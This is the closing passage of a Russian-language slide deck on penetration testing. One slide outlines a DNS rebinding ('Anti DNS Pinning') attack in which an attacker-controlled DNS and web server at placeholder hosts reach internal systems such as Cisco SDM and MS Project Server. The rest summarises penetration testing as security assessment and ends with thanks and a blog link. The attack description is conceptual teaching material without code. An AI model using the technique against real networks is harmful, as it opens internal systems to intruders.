  • 31. Уязвимость типа « Anti DNS Pinning » Cisco SDM 192.168.0.2 MS Project Server 192.168.0.1 Прочие Контролируемый DNS- сервер hack.example Контролируемый web- сервер any.name 7. Образуется полноценный канал для работы с внутренним ресурсом Контролируемый web- сервер www.hack.example (1.1.1.1)
  • 32. Резюме Тестирование на проникновение – это комплекс мероприятий, позволяющий провести эффективную оценку текущего состояния процессов обеспечения информационной безопасности Тестирование на проникновение – это поиск и использование недостатков в процессах обеспечения информационной безопасности управление уязвимостями управление конфигурациями управление инцидентами управление безопасностью веб-приложений, СУБД, ERP, проводными и беспроводными сетями и пр. etc
  • 33. PS. Тестирование на проникновение бывает разным…
  • 34. Спасибо за внимание! [email_address] http://devteev.blogspot.com/